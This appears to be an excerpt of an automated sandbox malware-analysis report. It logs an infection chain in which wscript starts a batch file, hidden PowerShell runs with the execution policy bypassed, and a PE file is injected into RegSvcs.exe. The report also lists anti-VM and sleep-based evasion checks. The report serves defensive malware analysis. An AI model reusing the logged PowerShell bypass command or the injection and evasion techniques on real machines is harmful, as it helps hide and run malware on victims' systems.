          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4172Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5631Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4221Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5603Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7161Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2686Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612Thread sleep time: -12912720851596678s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888Thread sleep count: 4221 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888Thread sleep count: 5603 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936Thread sleep time: -20291418481080494s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4CD2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4CD2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4CD2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4CD2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4B938000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000001.00000002.1628924395.0000026A6425F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlldd}#
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4B938000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4CD2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4CD2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4CD2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4CD2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4CD2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4CD2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4B938000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4CD2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
          Source: RegSvcs.exe, 0000000B.00000002.3866185490.0000000000B7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Bypasses PowerShell execution policy
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
          Injects a PE file into a foreign processes
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40A000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40C000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 613008Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
